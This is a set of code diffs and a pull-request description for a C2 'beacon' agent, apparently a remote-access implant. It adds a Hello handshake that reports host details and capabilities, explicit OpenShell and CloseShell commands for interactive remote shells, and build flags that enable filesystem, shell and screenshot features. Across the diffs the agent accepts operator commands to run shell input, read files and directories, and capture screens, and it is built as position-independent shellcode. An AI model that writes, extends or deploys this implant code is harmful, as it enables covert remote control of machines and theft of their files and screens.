+    Command_CloseShell = 8,
     Command_Exit = 9,
+    Command_OpenShell = 10,
     CommandTypeCount
 };
 
@@ -78,7 +79,8 @@ VOID Handle_GetFileContentCommand(PCHAR command, USIZE commandLength, PPCHAR res
 VOID Handle_GetFileChunkHashCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_ReadShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_WriteShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
-VOID Handle_ResetShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
+VOID Handle_OpenShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
+VOID Handle_CloseShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_GetDisplaysCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_GetScreenshotCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_ExitCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -102,6 +102,7 @@ VOID Handle_GetSystemInfoCommand([[maybe_unused]] PCHAR command, [[maybe_unused]
     buildInfo.BuildNumber = AGENT_BUILD_NUMBER;
     const CHAR commitHash[] = AGENT_COMMIT_HASH;
     Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(commitHash));
+    buildInfo.ApiVersion = AGENT_API_VERSION;
 
     *responseLength = sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo);
     *response = new CHAR[*responseLength];
@@ -111,8 +112,8 @@ VOID Handle_GetSystemInfoCommand([[maybe_unused]] PCHAR command, [[maybe_unused]
     Memory::Copy(*response + sizeof(UINT32), &info, sizeof(SystemInfo));
     Memory::Copy(*response + sizeof(UINT32) + sizeof(SystemInfo), &buildInfo, sizeof(AgentBuildInfo));
 
-    LOG_INFO("GetSystemInfo: hostname=%s, username=%s, arch=%s, agent_platform=%s, os_version=%s, build=%u, commit=%s",
-             info.Hostname, info.Username, info.Architecture, info.AgentPlatform, info.OSVersion, buildInfo.BuildNumber, buildInfo.CommitHash);
+    LOG_INFO("GetSystemInfo: hostname=%s, username=%s, arch=%s, agent_platform=%s, os_version=%s, build=%u, commit=%s, api=%u",
+             info.Hostname, info.Username, info.Architecture, info.AgentPlatform, info.OSVersion, buildInfo.BuildNumber, buildInfo.CommitHash, buildInfo.ApiVersion);
 }
 
 VOID Handle_GetDirectoryContentCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE commandLength, PPCHAR response, PUSIZE responseLength, [[maybe_unused]] Context *context)

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -101,7 +101,8 @@ VOID Handle_GetSystemInfoCommand([[maybe_unused]] PCHAR command, [[maybe_unused]
     AgentBuildInfo buildInfo;
     buildInfo.BuildNumber = AGENT_BUILD_NUMBER;
     const CHAR commitHash[] = AGENT_COMMIT_HASH;
-    Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(commitHash));
+    Memory::Zero(buildInfo.CommitHash, sizeof(buildInfo.CommitHash));
+    Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(buildInfo.CommitHash) - 1);
     buildInfo.ApiVersion = AGENT_API_VERSION;
 
     *responseLength = sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo);

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -285,6 +285,33 @@ VOID Handle_GetFileChunkHashCommand([[maybe_unused]] PCHAR command, [[maybe_unus
     LOG_INFO("GetFileChunkHash: hashed %llu bytes", (UINT64)totalRead);
 }
 
+// Open (spawn) a shell for a stream. Payload: [streamId:1].
+// Strict: errors if a shell is already open for the stream.
+VOID Handle_OpenShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context)
+{
+    LOG_INFO("Handling OpenShellCommand.");
+
+    if (commandLength < 1)
+    {
+        LOG_ERROR("OpenShell: missing stream id");
+        WriteErrorResponse(response, responseLength, StatusCode::StatusError);
+        return;
+    }
+
+    UINT8 streamId = (UINT8)command[0];
+    if (context->shellManager.Open(streamId) == nullptr)
+    {
+        LOG_ERROR("Failed to open shell for stream %u (invalid id, already open, or spawn failed)", (UINT32)streamId);
+        WriteErrorResponse(response, responseLength, StatusCode::StatusError);
+        return;
+    }
+
+    LOG_INFO("Shell opened for stream %u", (UINT32)streamId);
+    *responseLength = sizeof(UINT32);
+    *response = new CHAR[*responseLength];
+    *(PUINT32)*response = StatusCode::StatusSuccess;
+}
+
 // Writes a command to a shell. Payload: [streamId:1][UTF-8 input + '\0']
 VOID Handle_WriteShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context)
 {
@@ -301,10 +328,10 @@ VOID Handle_WriteShellCommand(PCHAR command, USIZE commandLength, PPCHAR respons
     PCHAR input = command + 1;
     USIZE inputLength = commandLength - 1;
 
-    Shell *shell = context->shellManager.GetOrCreate(streamId);
+    Shell *shell = context->shellManager.Get(streamId);
     if (shell == nullptr)
     {
-        LOG_ERROR("Failed to get/create shell instance for stream %u", (UINT32)streamId);
+        LOG_ERROR("WriteShell: no open shell for stream %u", (UINT32)streamId);
         WriteErrorResponse(response, responseLength, StatusCode::StatusError);
         return;
     }
@@ -318,7 +345,6 @@ VOID Handle_WriteShellCommand(PCHAR command, USIZE commandLength, PPCHAR respons
     {
         LOG_ERROR("Failed to write command to shell (stream %u)", (UINT32)streamId);
         WriteErrorResponse(response, responseLength, StatusCode::StatusError);
-        context->shellManager.Reset(streamId);
         return;
     }
     LOG_INFO("Command written to shell (stream %u), bytes written: %llu", (UINT32)streamId, writeResult.Value());
@@ -341,10 +367,10 @@ VOID Handle_ReadShellCommand(PCHAR command, USIZE commandLength, PPCHAR response
     }
 
     UINT8 streamId = (UINT8)command[0];
-    Shell *shell = context->shellManager.GetOrCreate(streamId);
+    Shell *shell = context->shellManager.Get(streamId);
     if (shell == nullptr)
     {
-        LOG_ERROR("Failed to get/create shell instance for stream %u", (UINT32)streamId);
+        LOG_ERROR("ReadShell: no open shell for stream %u", (UINT32)streamId);
         WriteErrorResponse(response, responseLength, StatusCode::StatusError);
         return;
     }
@@ -356,7 +382,6 @@ VOID Handle_ReadShellCommand(PCHAR command, USIZE commandLength, PPCHAR response
     {
         LOG_ERROR("Failed to read from shell (stream %u)", (UINT32)streamId);
         WriteErrorResponse(response, responseLength, StatusCode::StatusError);
-        context->shellManager.Reset(streamId);
         return;
     }
 
@@ -368,21 +393,21 @@ VOID Handle_ReadShellCommand(PCHAR command, USIZE commandLength, PPCHAR response
     StringUtils::Copy(Span<CHAR>(*response + sizeof(UINT32), bytesRead), Span<const CHAR>(buffer, bytesRead));
 }
 
-// Reset a shell instance. Payload: [streamId:1]. Idempotent.
-VOID Handle_ResetShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context)
+// Close a shell instance. Payload: [streamId:1]. Idempotent.
+VOID Handle_CloseShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context)
 {
-    LOG_INFO("Handling ResetShellCommand.");
+    LOG_INFO("Handling CloseShellCommand.");
 
     if (commandLength < 1)
     {
-        LOG_ERROR("ResetShell: missing stream id");
+        LOG_ERROR("CloseShell: missing stream id");
         WriteErrorResponse(response, responseLength, StatusCode::StatusError);
         return;
     }
 
     UINT8 streamId = (UINT8)command[0];
-    context->shellManager.Reset(streamId);
-    LOG_INFO("Shell instance reset for stream %u", (UINT32)streamId);
+    context->shellManager.Close(streamId);
+    LOG_INFO("Shell instance closed for stream %u", (UINT32)streamId);
 
     *responseLength = sizeof(UINT32);
     *response = new CHAR[*responseLength];

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -90,9 +90,9 @@ static BOOL IsDotEntry(const DirectoryEntry &entry)
 // Command handlers
 // =============================================================================
 
-VOID Handle_GetSystemInfoCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE commandLength, PPCHAR response, PUSIZE responseLength, [[maybe_unused]] Context *context)
+VOID Handle_HelloCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE commandLength, PPCHAR response, PUSIZE responseLength, [[maybe_unused]] Context *context)
 {
-    LOG_INFO("Handling GetSystemInfoCommand.");
+    LOG_INFO("Handling HelloCommand.");
     // Retrieve system information
     SystemInfo info;
     GetSystemInfo(&info);
@@ -105,15 +105,19 @@ VOID Handle_GetSystemInfoCommand([[maybe_unused]] PCHAR command, [[maybe_unused]
     Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(buildInfo.CommitHash) - 1);
     buildInfo.ApiVersion = AGENT_API_VERSION;
 
-    *responseLength = sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo);
+    // 256-bit capability mask: bit i set iff command code i is supported.
+    CapabilityMask capabilities = BuildCapabilityMask();
+
+    *responseLength = sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo) + sizeof(CapabilityMask);
     *response = new CHAR[*responseLength];
     *(PUINT32)*response = StatusCode::StatusSuccess;
 
-    // Append system info and build info to the response buffer
+    // Append system info, build info, and capability mask to the response buffer
     Memory::Copy(*response + sizeof(UINT32), &info, sizeof(SystemInfo));
     Memory::Copy(*response + sizeof(UINT32) + sizeof(SystemInfo), &buildInfo, sizeof(AgentBuildInfo));
+    Memory::Copy(*response + sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo), &capabilities, sizeof(CapabilityMask));
 
-    LOG_INFO("GetSystemInfo: hostname=%s, username=%s, arch=%s, agent_platform=%s, os_version=%s, build=%u, commit=%s, api=%u",
+    LOG_INFO("Hello: hostname=%s, username=%s, arch=%s, agent_platform=%s, os_version=%s, build=%u, commit=%s, api=%u",
              info.Hostname, info.Username, info.Architecture, info.AgentPlatform, info.OSVersion, buildInfo.BuildNumber, buildInfo.CommitHash, buildInfo.ApiVersion);
 }
 

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -105,7 +105,7 @@ VOID Handle_HelloCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE 
     Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(buildInfo.CommitHash) - 1);
     buildInfo.ApiVersion = AGENT_API_VERSION;
 
-    // 256-bit capability mask: bit i set iff command code i is supported.
+    // 64-bit capability mask: bit i set iff category i (CapabilityBit) is supported.
     CapabilityMask capabilities = BuildCapabilityMask();
 
     *responseLength = sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo) + sizeof(CapabilityMask);

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -104,6 +104,7 @@ VOID Handle_HelloCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE 
     Memory::Zero(buildInfo.CommitHash, sizeof(buildInfo.CommitHash));
     Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(buildInfo.CommitHash) - 1);
     buildInfo.ApiVersion = AGENT_API_VERSION;
+    buildInfo.Is64Bit = (sizeof(void*) == 8);
 
     // 64-bit capability mask: bit i set iff category i (CapabilityBit) is supported.
     CapabilityMask capabilities = BuildCapabilityMask();

--- a/src/beacon/main.cc
+++ b/src/beacon/main.cc
@@ -8,8 +8,8 @@ static const CHAR *CommandTypeName(UINT8 type)
 {
     switch (type)
     {
-    case CommandType::Command_GetSystemInfo:
-        return "GetSystemInfo";
+    case CommandType::Command_Hello:
+        return "Hello";
     case CommandType::Command_GetDirectoryContent:
         return "GetDirectoryContent";
     case CommandType::Command_GetFileContent:
@@ -52,17 +52,39 @@ INT32 start()
     UINT32 connectionAttempt = 0;
 
     CommandHandler commandHandlers[CommandType::CommandTypeCount] = {nullptr};
-    commandHandlers[CommandType::Command_GetSystemInfo] = Handle_GetSystemInfoCommand;
+#if AGENT_SUPPORT_HELLO
+    commandHandlers[CommandType::Command_Hello] = Handle_HelloCommand;
+#endif
+#if AGENT_SUPPORT_GET_DIRECTORY_CONTENT
     commandHandlers[CommandType::Command_GetDirectoryContent] = Handle_GetDirectoryContentCommand;
+#endif
+#if AGENT_SUPPORT_GET_FILE_CONTENT
     commandHandlers[CommandType::Command_GetFileContent] = Handle_GetFileContentCommand;
+#endif
+#if AGENT_SUPPORT_GET_FILE_CHUNK_HASH
     commandHandlers[CommandType::Command_GetFileChunkHash] = Handle_GetFileChunkHashCommand;
+#endif
+#if AGENT_SUPPORT_WRITE_SHELL
     commandHandlers[CommandType::Command_WriteShell] = Handle_WriteShellCommand;
+#endif
+#if AGENT_SUPPORT_READ_SHELL
     commandHandlers[CommandType::Command_ReadShell] = Handle_ReadShellCommand;
+#endif
+#if AGENT_SUPPORT_GET_DISPLAYS
     commandHandlers[CommandType::Command_GetDisplays] = Handle_GetDisplaysCommand;
+#endif
+#if AGENT_SUPPORT_GET_SCREENSHOT
     commandHandlers[CommandType::Command_GetScreenshot] = Handle_GetScreenshotCommand;
+#endif
+#if AGENT_SUPPORT_CLOSE_SHELL
     commandHandlers[CommandType::Command_CloseShell] = Handle_CloseShellCommand;
+#endif
+#if AGENT_SUPPORT_EXIT
     commandHandlers[CommandType::Command_Exit] = Handle_ExitCommand;
+#endif
+#if AGENT_SUPPORT_OPEN_SHELL
     commandHandlers[CommandType::Command_OpenShell] = Handle_OpenShellCommand;
+#endif
 
     LOG_INFO("Agent starting, registered %d command handlers", (INT32)CommandType::CommandTypeCount);
 

--- a/src/beacon/main.cc
+++ b/src/beacon/main.cc
@@ -52,38 +52,23 @@ INT32 start()
     UINT32 connectionAttempt = 0;
 
     CommandHandler commandHandlers[CommandType::CommandTypeCount] = {nullptr};
-#if AGENT_SUPPORT_HELLO
+    // Core (mandatory, always registered)
     commandHandlers[CommandType::Command_Hello] = Handle_HelloCommand;
-#endif
-#if AGENT_SUPPORT_GET_DIRECTORY_CONTENT
+    commandHandlers[CommandType::Command_Exit] = Handle_ExitCommand;
+#if SUPPORT_FILESYSTEM
     commandHandlers[CommandType::Command_GetDirectoryContent] = Handle_GetDirectoryContentCommand;
+    commandHandlers[CommandType::Command_GetFileContent]      = Handle_GetFileContentCommand;
+    commandHandlers[CommandType::Command_GetFileChunkHash]    = Handle_GetFileChunkHashCommand;
 #endif
-#if AGENT_SUPPORT_GET_FILE_CONTENT
-    commandHandlers[CommandType::Command_GetFileContent] = Handle_GetFileContentCommand;
-#endif
-#if AGENT_SUPPORT_GET_FILE_CHUNK_HASH
-    commandHandlers[CommandType::Command_GetFileChunkHash] = Handle_GetFileChunkHashCommand;
-#endif
-#if AGENT_SUPPORT_WRITE_SHELL
+#if SUPPORT_SHELL
+    commandHandlers[CommandType::Command_OpenShell]  = Handle_OpenShellCommand;
+    commandHandlers[CommandType::Command_CloseShell] = Handle_CloseShellCommand;
+    commandHandlers[CommandType::Command_ReadShell]  = Handle_ReadShellCommand;
     commandHandlers[CommandType::Command_WriteShell] = Handle_WriteShellCommand;
 #endif
-#if AGENT_SUPPORT_READ_SHELL
-    commandHandlers[CommandType::Command_ReadShell] = Handle_ReadShellCommand;
-#endif
-#if AGENT_SUPPORT_GET_DISPLAYS
-    commandHandlers[CommandType::Command_GetDisplays] = Handle_GetDisplaysCommand;
-#endif
-#if AGENT_SUPPORT_GET_SCREENSHOT
+#if SUPPORT_DISPLAY
+    commandHandlers[CommandType::Command_GetDisplays]   = Handle_GetDisplaysCommand;
     commandHandlers[CommandType::Command_GetScreenshot] = Handle_GetScreenshotCommand;
-#endif
-#if AGENT_SUPPORT_CLOSE_SHELL
-    commandHandlers[CommandType::Command_CloseShell] = Handle_CloseShellCommand;
-#endif
-#if AGENT_SUPPORT_EXIT
-    commandHandlers[CommandType::Command_Exit] = Handle_ExitCommand;
-#endif
-#if AGENT_SUPPORT_OPEN_SHELL
-    commandHandlers[CommandType::Command_OpenShell] = Handle_OpenShellCommand;
 #endif
 
     LOG_INFO("Agent starting, registered %d command handlers", (INT32)CommandType::CommandTypeCount);

--- a/src/beacon/main.cc
+++ b/src/beacon/main.cc
@@ -24,10 +24,12 @@ static const CHAR *CommandTypeName(UINT8 type)
         return "GetDisplays";
     case CommandType::Command_GetScreenshot:
         return "GetScreenshot";
-    case CommandType::Command_ResetShell:
-        return "ResetShell";
+    case CommandType::Command_CloseShell:
+        return "CloseShell";
     case CommandType::Command_Exit:
         return "Exit";
+    case CommandType::Command_OpenShell:
+        return "OpenShell";
     default:
         return "Unknown";
     }
@@ -58,8 +60,9 @@ INT32 start()
     commandHandlers[CommandType::Command_ReadShell] = Handle_ReadShellCommand;
     commandHandlers[CommandType::Command_GetDisplays] = Handle_GetDisplaysCommand;
     commandHandlers[CommandType::Command_GetScreenshot] = Handle_GetScreenshotCommand;
-    commandHandlers[CommandType::Command_ResetShell] = Handle_ResetShellCommand;
+    commandHandlers[CommandType::Command_CloseShell] = Handle_CloseShellCommand;
     commandHandlers[CommandType::Command_Exit] = Handle_ExitCommand;
+    commandHandlers[CommandType::Command_OpenShell] = Handle_OpenShellCommand;
 
     LOG_INFO("Agent starting, registered %d command handlers", (INT32)CommandType::CommandTypeCount);
 

--- a/src/beacon/shell.h
+++ b/src/beacon/shell.h
@@ -27,9 +27,10 @@ public:
  *
  * @details Gives each consumer an isolated shell: stream 0 is the operator's
  * interactive shell; stream 1+ are used by scripted consumers (e.g. the C2
- * File Manager driving PowerShell). Each shell is lazily created on first use
- * and destroyed in the destructor. Encapsulates the per-stream shells so Context
- * holds a single member rather than a raw array.
+ * File Manager driving PowerShell). A shell must be explicitly opened with
+ * Open() before it can be read/written, and is destroyed with Close() or in
+ * the destructor. Encapsulates the per-stream shells so Context holds a single
+ * member rather than a raw array.
  */
 class ShellManager
 {
@@ -55,24 +56,33 @@ public:
     ShellManager(const ShellManager &) = delete;
     ShellManager &operator=(const ShellManager &) = delete;
 
-    /// Get the shell for a stream, lazily creating it on first use.
-    /// @return The shell, or nullptr if streamId is invalid or creation failed.
-    Shell *GetOrCreate(UINT8 streamId)
+    /// Look up an already-open shell. Never spawns.
+    /// @return The shell, or nullptr if streamId is invalid or no shell is open.
+    Shell *Get(UINT8 streamId)
     {
         if (streamId >= MAX_STREAMS)
             return nullptr;
-        if (shells[streamId] == nullptr)
-        {
-            auto shellResult = Shell::Create();
-            if (!shellResult)
-                return nullptr;
-            shells[streamId] = new Shell(static_cast<Shell &&>(shellResult.Value()));
-        }
         return shells[streamId];
     }
 
-    /// Destroy a stream's shell (idempotent — safe if it was never created).
-    VOID Reset(UINT8 streamId)
+    /// Explicitly open (spawn) a shell for a stream. Strict: if a shell is
+    /// already open for the stream, returns nullptr (caller must Close first).
+    /// @return The new shell, or nullptr if streamId is invalid, already open, or spawn failed.
+    Shell *Open(UINT8 streamId)
+    {
+        if (streamId >= MAX_STREAMS)
+            return nullptr;
+        if (shells[streamId] != nullptr)
+            return nullptr; // strict: refuse if already open
+        auto shellResult = Shell::Create();
+        if (!shellResult)
+            return nullptr;
+        shells[streamId] = new Shell(static_cast<Shell &&>(shellResult.Value()));
+        return shells[streamId];
+    }
+
+    /// Destroy a stream's shell (idempotent — safe if it was never opened).
+    VOID Close(UINT8 streamId)
     {
         if (streamId >= MAX_STREAMS)
             return;


### PR DESCRIPTION
## Summary

<!-- Brief description of the changes (1-3 sentences) -->

This pull request introduces a new extensible capability advertisement mechanism to the agent protocol, centered on a new `Hello` handshake command that replaces the previous `GetSystemInfo` command. The `Hello` command now returns system and build information along with a 64-bit capability mask, allowing the C2 to discover which feature categories the agent supports at runtime. The change also adds new shell management commands (`OpenShell`, `CloseShell`), refines command naming and wiring throughout the codebase and documentation, and introduces compile-time macros to control feature inclusion per build/platform.

## Type of Change

- [ ] Bug fix
- [x] New feature / command
- [ ] Refactoring (no functional changes)
- [ ] Documentation
- [ ] Build system / CI
- [ ] Other:

## Platforms Tested

<!-- List the platform-architecture presets you built and tested against -->

- [x] `windows-x86_64-release`
- [ ] `linux-x86_64-release`
- [ ] `macos-aarch64-release`
- [ ] Other:

## Binary Size Impact

<!-- Required: Report .text section size before and after your change for at least one preset -->
<!-- Use: llvm-size build/release/<platform>/<arch>/output.exe -->

```
Preset: Windows-x86_64-release
Before: exe 104,448 bytes, bin 102,599 bytes
After:  exe 104,960 bytes, bin 103,155 bytes
Diff:   +512 B / +556 B
```

## Checklist

- [x] Build passes with no warnings for at least one preset
- [x] Post-build PIC verification passes (no `.rdata`/`.rodata`/`.data`/`.bss` sections)
- [x] Code follows [naming conventions](CONTRIBUTING.md#naming-conventions) and [code style](CONTRIBUTING.md#code-style)
- [x] Doxygen documentation added for new public APIs
- [x] No STL, no exceptions, no RTTI
- [x] `Result<T, Error>` used for all fallible functions
- [x] Binary size diff reported above
- [x] README updated (if adding/modifying commands)

## Additional Notes

<!-- Any context, design decisions, trade-offs, or related issues -->
